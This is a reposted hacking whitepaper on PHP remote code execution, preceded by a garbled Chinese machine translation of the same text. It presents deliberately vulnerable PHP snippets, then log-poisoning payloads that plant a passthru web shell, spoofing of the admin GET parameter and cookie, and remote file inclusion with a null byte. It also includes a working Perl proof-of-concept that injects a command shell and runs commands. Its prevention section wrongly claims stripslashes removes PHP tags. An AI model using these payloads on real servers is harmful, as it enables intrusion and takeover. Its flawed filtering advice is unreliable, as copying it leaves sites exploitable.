phpendangers.txt文件.

释放双眼,带上耳机,听听看~!

phpendangers.txt,PHP Endangers.txt,

白皮书题为PHP危害-远程代码执行。

,/*Php危害-远程代码执行arhamm Muhammad rko.thelegendkiller@gmail.com*/======Arham Muhammad Hacking-Truths.Net的一篇文章========x41-简介x42-远程代码执行的基础知识及其如何开发x43-攻击者如何利用此漏洞并误用它!第三条:远程代码执行是当前时代范围广泛的Web应用程序,它允许远程攻击者执行。X44预防与过滤X45—结论具有管理员权限的系统中的任意代码不需要目标站点所有者的注意。这不是一个要避免的漏洞,而是一个极其危险的漏洞,它可能会危及您的站点,使其受到不同的攻击、恶意删除数据,甚至最坏的破坏!我国将重点介绍一些基本的远程代码执行仍存在于这个Web应用程序开发的时代。企业并购我们现在将检查一个评论表单,从用户处获取评论(“submit.php”)并将其发布到“comments.php”,我们正在使用简单的post方法分析submit.php,该方法提交收集的用户输入并将请求转发到comments.php。/*submit.php::

==comments.php::<?php$comments=$_POST['comments'];$log=fopen('comments.php','a');fwrite($log,''..''.'comments::'.'.$comments);fclose($log)?>*/现在只要看看,我们就可以很容易地证明它是疯狂的!怎么用??嗯,我们可以看到,有一个表单将用户输入的(曾经是什么样的)评论提交到comments.php,其中包括恶意的,它将评论完全按照用户输入的内容写入,而不会被清除。这意味着这里的攻击者正通过执行一些恶意请求充分利用易受攻击的评论提交表单,这可能只是为了收集服务器的详细信息,比如使用phpinfo(),这是当今攻击者的特例,或者更可悲的是在易受攻击的服务器上获取shell。我们将以另一个使用GET-request显示错误消息并用特定消息记录ip为例。(这是编码器在为组织开发网站等时设置的常见漏洞)。’x’。/*php::<?php$msg=$_GET['msg'];$ip=getenv('REMOTE_ADDR');$error=fopen('errorlog.php','a');fwrite($error,''.$msg.''.$ip.'';fclose($error)?>*/这篇文章不仅影响并易受远程代码执行的攻击,而且还可能受到其他几种攻击,包括xss、javascript注入、vbscript注入等。这也将允许远程攻击者定位日志文件并将恶意代码注入日志。现在我将突出显示另一种类型的远程代码执行,也可以定义为定位cookie;)/*<?php需要(“config.php”);如果(!isset($_COOKIE['admin']){头(“位置:admin.php?user=admin“);}?>*/现在我们看到代码真的很生气!简单地说,它试图说如果系统的cookies与“admin”匹配,那么它将验证一个用户是否为管理员,这是完全错误的!我们将看到另一个这样的示例,它使用GET请求来验证用户状态://*$admin=$_GET[‘admin’];if(!isset($admin==1){$queryyz=“SELECT*from user where username=’$admin’;header(“Location:admin/admin.php”);}*/它可以是mor比这更复杂的是,像大多数可能的情况一样,如果变量“admin”与“1”匹配,则可以使用会话来验证admin,当admin=1时,这只是一个用于选择administrator作为用户的sql查询;)该查询可能提供了另一个漏洞:P Yeah,right“sql INJection!”;如果存在文件处理系统且未进行清理,也可以通过头沉积或任意文件上载来执行远程代码。一个攻击者是如何利用这个漏洞并误用它的!是的文件上写着“x”。攻击者将竭尽全力获取正在写入数据的文件,攻击者使用路径数组成功利用该文件进行攻击,当然,攻击者可能会注入一些恶意字符串以检查是否正在过滤输出,在这种情况下,它不会进行任何检查,也不会使用htmlentities或htmlspecialchars()函数。因此攻击者很可能会从中得到很大的好处。很可能他会尝试在目标服务器上生成一个s hell,以充分利用他或她的黑帽子(blackhat)功能;)假设对受害者主机http://victive.xxx/info.php进行攻击?消息=<?通过($_GET['attacker'])?>这将定位日志文件并插入一段易受攻击的代码,该代码稍后可被利用,并被视为远程文件包含(RFI)漏洞,以便在受攻击服务器上获取shell并显示其肮脏的工作。。可能是,http://victim.xxx/errorlog.php?攻击者=Sh3ll?||这就行了!;)在其他一些情况下,比如“如果”!isset($admin==1)“它也很容易被利用,攻击者只需从服务器请求中欺骗变量,这一点都不难成为GET变量:p http://victim.xxx/file.php?admin=1这就可以了;)对于cookies来说也是一样的。。。只需要编辑饼干,你就是主人!假设下面的模式:如果(!isset($_COOKIE[‘administrator’]){//下面的一些Authencation头。。。}在这种类型的模式中,您只需将cookies更改为administrator和tada,您就可以作为administration了!最好小心处理这个案子。我现在要写一点POC(概念证明),以便远程轻松地解释和利用目标!使用这种脚本来解释问题并成功执行命令并不好,但很重要,因为浏览器肯定会对您的标记进行编码,使请求一点也不高效和成功!下面的脚本将绕过这一点,并不惜一切代价来实现它的目的:)=================================================================================/*=!/usr/bin/perl#Php危害-远程代码执行#POC注入并执行恶意请求,可能生成并执行shell命令使用LWP::Simple;使用LWP::UserAgent;sub header(){print q{———用法Example roc.pl http://127.0.0.1 info.php msg errorlog.php http://127.0.0.1/r57.txt ls-la———————————–}$inject=“<?php if(get_magic_quotes_gpc()){/$_get[cmd]=条斜杠(/$_get[cmd])/;}通过(/$_get[cmd])/?>“;#您可能会注意到一些用于注入的附加函数e将执行并产生99%的成功结果;它将帮助并绕过magic quotes func和stripslaces,这可能对攻击者有很大好处!如果(@ARGV!=5){header();}$target=@ARGV[0];$file=@ARGV[1];$var=@ARGV[2];$log=@ARGV[3];$shell=@ARGV[4];$command=@ARGV[5];$agent=LWP::UserAgent->new();$exec=“http://$target/$file?$var=$inject“;$agent->get($exec”);$exec2=”http://$target/$log?攻击者=$shell&$cmd=$command?“;$agent->get(“$exec2”)或die“主机似乎关闭”;print“注入成功!!“;print”在“.”上手动检查Shell。http://$target/$log?攻击者=$shell&$cmd=$command?“;#远程代码执行#利用roc(远程代码执行)漏洞的解释POC。*/一段如下所述的代码中的空字节注入::,对于攻击者来说,如何消除强制文件扩展名并利用此漏洞或使用包含在标记服务器上执行Shell将是一个奇迹。现在,我们可以清楚地将上述代码声明为一个关键漏洞,帮助攻击者根据攻击者的策略执行lfi或rfi,但很明显,由于扩展增量问题,包含操作将失败。现在,攻击者肯定会喜欢这样做,并试图通过使用空字节或将空字节定位到服务器来删除扩展。下面是一个例子,当在这种情况下执行包含时,具体会发生什么情况::http://victim.xxx/include.php?文件=http://127.0.0.1/sh3ll.txt?由于代码在$file变量后添加扩展名,这意味着它将在.txt之后添加.php,从而使利用漏洞的行为变得愚蠢,简单地说,它将使请求看起来像::http://victim.xxx/include.php?文件=http://127.0.0.1/sh3ll.txt.php?这种情况不存在!现在,攻击者将通过在请求中定位空字节来消除扩展以成功利用此问题,下面是攻击者将如何做到这一点:http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt%00这将使请求消除附加扩展名,并成功利用此问题!一种预防方法:最好设计一种可以清理和过滤用户输入的形式在服务器上写入或实际执行请求之前。使用内置于htmlentities();htmlspecialchars()中的php,以及最重要的strip_标记和stripslashes函数,可以轻松完成这项工作。这将中止恶意请求,并在恶意标记中止后执行该请求。例如,攻击者试图将一段代码“y”注入GET变量。。。。http://vical.xxx/file.php?变量=<?phpinfo()?>现在,如果文件受到htmlentities、htmlspecialchars、strip_tags或stripslashes()保护,那么这将使攻击者的请求完全变哑,当然毫无用处!假设一个简单的过滤模式:/*<?php$data=stripslashes($_GET['data']);$fh=fopen('file.php','a');fwrite($fh,$data);fclose($fh)?>*/这将中止标记“<?”, "?>“,”(“)”和当然会使代码的其余部分不再使用,因为“phpinfo”不是疯狂的或看起来是恶意的,服务器只会以完全的ascii格式将其写入文件。使用magicquotes还有更好的治疗方法,如果使用不当,怎么可能导致其他一些复杂的问题,所以不建议初学者知道他们在做什么。一、二、三、四、四、四、四、四、四、四、四、四、四、四、四、四、四、四、四、结论=====================================================================一个结论:我用了几个例子来解释远程代码执行的基本原理以及它是如何被植入到web应用程序中的。我已经尽我所能用简单易懂的语言,包括这里提到的所有代码来解释这些术语和结果。但是,我不承担任何通过获取论文中的知识而造成的任何误用或损坏的责任。除此之外,我强烈建议大家通读一下,这是简单易懂的,并且会唤醒一点点粗心的错误都会遇到危险!+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++PhP EnDang3rs-R3m0t3 c0d3 3x3cu-|!====问候::str0ke(支持和最好!),哈克曼(简单地说是gr8),塔西,(欠你很多!)阿卜杜拉,萨阿德,费萨尔,玛兹,塔哈,当然还有我甜蜜的安比(我的爱!!);)祝愿我在米尔沃姆论坛(我爱的地方,每个人都爱的地方)的所有朋友和整个巴基斯坦!!当然是Hacking-Truths.Net-一个掌握最新信息的好地方!和Evergreen milw0rm.com===============================================================================,网络安全教程phpendangers.txt,

Whitepaper entitled PHP Endangers – Remote Code Execution.

,/*
Php Endangers - Remote Code Execution
Arham Muhammad
rko.thelegendkiller@gmail.com

*/

============================
An Article By Arham Muhammad
Hacking-Truths.Net
============================

x41 - Intro
x42 - Basics Of Remote Code Execution And How It Develops
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
x44 - Prevention And Filtration
x45 - Conclusion

========================================================
x41 - Intro
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The B@sIc::
InTr0:

Remote Code Execution Is Yet Another Common Vulnerability
existing is wide range of web apps in the current era.It allows a remote
attacker to execute arbitrary code in the sytem
with administrator privelages without the attention of
the owner of the targetted site.It's just not a-hole-to-avoid, but an
extremely risky vulnerability,which can endanger your site to different attacks,
malicious deletion of data,even worst Defacing!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

x42 - Basics Of Remote Code Execution And How It Develops
============================================================

Basic Remote Code Executions:

Now I will highlight some basics remote code executions
being planted that exist still in this era of web app development.

We will now examine a comment form getting comments from a user("submit.php") and posting it at "comments.php"

We Are analyzing submit.php with simple post method that submits the gathered user input and forward the request to
comments.php.

/*

submit.php::

<form method="POST" action="">
<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>

==========================================================

comments.php::

<?php

$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);
fclose($log);

?>

*/

Now by just looking at it, we could very easily proove it as insane! How?? Well,as we can see there is a form that submits
a user inputted(what-so-ever) comments to comments.php including malicious which writes the comments exactly as user's input
witout being sanitized.This means that an attacker here is getting full advantage to exploit the vulnerable comments
submission form by executing some malicious request, which could be just to gather server details like using phpinfo()
which is an exceptional case for attackers these days,or even more pathetic could be getting a shell on a vulnerable server.

We will take another example using GET request to display error message and log the ip with the specific message.
(it's a common vulnerability planted by the coder while developing a website for an organization,etc).'x'.

/*

info.php::

<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>

*/

This piece not only effect and vulnerable to remote code execution but also to several other attacks including
xss,javascript injection,vbscript injection etc.

This will too allow a remote attacker to posion the log file and inject malicious code to the logs.
============================================================================================================

Now I will highlight another type of remote code execution can also be defined as posioning the cookies ;)

/*
<?php
require("config.php");
if(!isset($_COOKIE['admin']))
{
header("Location:admin.php?user=admin");
}
?>
*/

Now we see the code is really pissed! In simple terms, its trying to say if the cookies of the system matches "admin"
then it verifies a user as the administrator.This is totally bad!

We will look upon another example like this which uses GET request to verify a user status::

/*
$admin = $_GET['admin'];
if(!isset($admin == 1)){
$queryxyz = "SELECT * from user where username='$admin'";
header("Location:admin/admin.php");
}
*/

It can be just more complicated than that, like most possibly there can be usage of sessions to verify admin if the
variable "admin" would match "1", how ever this is just an sql query used to select administrator as the user when
admin = 1 ;) The query is giving possibly another vulnerability :P Yeah, right "Sql INJection!";
=================================================================================================================

Remote Code Execution is also possible through headers deposition or an arbitrary file upload if theres a file processing
system and is not sanitized.

=================================================================================================================

=========================================================================================================
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
=========================================================================================================

I will highlight exactly how an attacker manage to do this

Likely supposing an attacker finding a vulnerable target and he got hold of the news that a GET variable have been
implemented here in order to log a particular data to some specific file lets say 'x'. The attacker will struggle to their
best to get hold of the file where the data is being wrote, path arrays are used by the attacker for successfull exploitation
and then of course the attacker will likely inject some malicious
string in order to check if it's filtering the output, in this case no it's not doing any checkup or using htmlentities or
htmlspecialchars() funcs.So the attacker will likely get a hell lot of benefit from this.Most probably he will try to spawn
a shell on the targetted server to gain full advantages of his or her blackhat stuff ;)
Supposing an attack on the victim host

http://victim.xxx/info.php?msg=<? passthru($_GET['attacker']); ?>

This will posion the log file and inject a vulnerable piece of code which can be later exploited and
treated as a Remote File Inclusion(RFI) Vulnerability
to get a shell on the victim server and show his/her dirty works..

Probably, ||http://victim.xxx/errorlog.php?attacker=Sh3ll?||

This will do the work! ;)

In some other cases like the one "if(!isset($admin == 1)" it could be also exploited with great ease, the attacker just
have to spoof the variable from the server request and that's not at all difficult being a GET variable :p

http://victim.xxx/file.php?admin=1

This will do it ;)

and for the cookies thingy it's same... just need to edit cookies and you are the master!

Supposingly the below pattern::

if(!isset($_COOKIE['administrator'])){
//Some Authencation Headers Below
...
}

In this type of pattern, you just change the cookies to administrator and tada you are in as admin!

It's better to handle the case with care.I will now write a little POC(Proof-Of-Concept) in order to explain
and exploit the target remotely and quite easily! It's not good but important to use such kind of script
to expoit the issue and execute the command successfully,since the browser will surely encode your tags, making
the request not at all efficient and successful!

The below script would bypass this, and fulfill it's purpose at all cost :)

=================================================================================================

POC::
/*
#!/usr/bin/perl
#Php Endangers - Remote Code Execution
#POC To inject and execute a malicious request, probably spawning and executing a shell command

use LWP::Simple;
use LWP::UserAgent;

sub header()
{

print q{
-----------------------------------------------------------------------------------------
Usage <target> <vulnerable file> <variable> <log file> <shell> <command>
Example roc.pl http://127.0.0.1 info.php msg errorlog.php http://127.0.0.1/r57.txt ls -la
------------------------------------------------------------------------------------------
}
}

$inject = "<?php if(get_magic_quotes_gpc()){ /$_GET[cmd]=stripslashes(/$_GET[cmd])/;} passthru(/$_GET[cmd])/; ?>";

#You may notice some additional funcs used to inject, these are to execute and produce 99% successful result
#it would help and bypass magic_quotes func and stripslashes too, that would possibly of lot good to the attacker!

if(@ARGV !=5){
header();
}

$target = @ARGV[0];
$file = @ARGV[1];
$var = @ARGV[2];
$log = @ARGV[3];
$shell = @ARGV[4];
$command = @ARGV[5];

$agent = LWP::UserAgent->new();
$exec = "http://$target/$file?$var=$inject";
$agent->get("$exec");
$exec2 = "http://$target/$log?attacker=$shell&$cmd=$command?";
$agent->get("$exec2")
or die"Host Seems Down";
print "Injected Successfully!!";

print "Check The Shell Manually At"." "."http://$target/$log?attacker=$shell&$cmd=$command?";

#REMOTE CODE EXECUTION
#An explanation POC for exploiting the roc(Remote CODE Execution) Vulnerability.
*/

===============================================================================================================
Null Bytes Injection::

In A Piece Of Code Like One Mentioned Below, It Would Be A Wonder To An Attacker How To Eliminate The Compulsory
File Extension And Exploit The Vulnerability Or Use The Inclusion To Execute A Shell Upon The Tagetted Server.

<?php
$file = $_GET['file'];
include('$file.php');
?>

Now we can clearly declare the above code as a critical vulnerability, helping attacker to do a lfi or rfi depending
on the attacker's strategy.But it's clear that the inclusion would be failed because of the extension increment issue.

Now the attacker would surely like this at all, and will try to elminate the extension by using NULL BYTES Or Posioning
null bytes in to the server.

Below is an example what exactly happens when a inclusion is performed in such case::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt?

since the code is adding extensions after $file variable means it would be adding .php after .txt, thus making
the exploitation dumb,in simple it would make the request looks like::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt.php?

Where such case dont exist!

Now the attacker will eliminate the extension to successfully exploit the issue by posioning null bytes in the request
made,below is how the attacker will manage to do so::

http://victim.xxx/include.php?file=http://127.0.0.1/sh3ll.txt%00

This would make the request eliminate the additional extension, and would successfully exploit the issue!

=====================================================================================================
x44 - Prevention And Filtration

=====================================================================================================
Prevention::

It's better to design what-so-ever form in such a way that it sanitizes and filters a user input before
writing or actually executing the request on the server. This can be done easily with the ease of php
built in htmlentities(); htmlspecialchars(); and most importantly strip_tags and stripslashes functions.
This Will abort a malicious request and will execute the request after the malicious tags had been aborted.
For instance an attacker trying to inject a piece of code 'y' to a GET variable....

http://victim.xxx/file.php?var=<? phpinfo(); ?>

now if the file is under htmlentities,htmlspecialchars,strip_tags or stripslashes() protection, then this will make the
request of the attacker totally dumb and of course of no use!

Supposingly a simple filtration pattern:

/*
<?php
$data = stripslashes($_GET['data']);
$fh = fopen('file.php','a');
fwrite($fh,$data);
fclose($fh);
?>
*/

This will abort the tags "<?", "?>","()" and ofcourse will make the rest of the piece of code of no use since
"phpinfo" is not insane or looks malicious the server will only write that in exact ascii form to the file.

There are even better cures by using magicquotes on, how ever it can cause some other complicated problems if not used properly,
so it's not recommended to beginners until they know what they are doing.

===========================================================================================================================
x45 - Conclusion
===========================================================================================================================

Conclusion::

I have used several examples to explain the basics of remote code execution and exactly how it's planted in web apps.
I have tried my level best to explain the terms and consequences in simple and easy words including all piece of codes
mentioned here.However I don't hold any responsibility of any misuse or dirtyworks performed by gaining the knowledge
within the paper.Beside this, I strongly recommend all to go through it, it's simple and easy and will awoke the dangers
that can be encountered by little careless mistakes!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PhP EnDang3rs - R3m0t3 c0d3 3x3cu-|!on

===============================================================================================================================================================
Greets:: str0ke(soo supportive nd the best!),HackMan(simply gr8),tushy,(owe you a lot!) Abdullah,Saad,Faisal,
Maaz,Talha And Ofcourse my sweet sweet AmBi(My love!!) ;)

Wishes also goes to all my friends at milw0rm forum(the place i loved and every body does) and to the whole of
Pakistan!!

Of course Hacking-Truths.Net - A Great Place To Get Hold With Latest Stuff!

And Evergreen milw0rm.com

================================================================================

人已赞赏
安全工具

<p>sql-inject.pdf文件.</p>

2020-2-6 3:37:45

安全工具

<p>oracle-forensics-6.pdf文件.</p>

2020-2-6 3:37:47

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索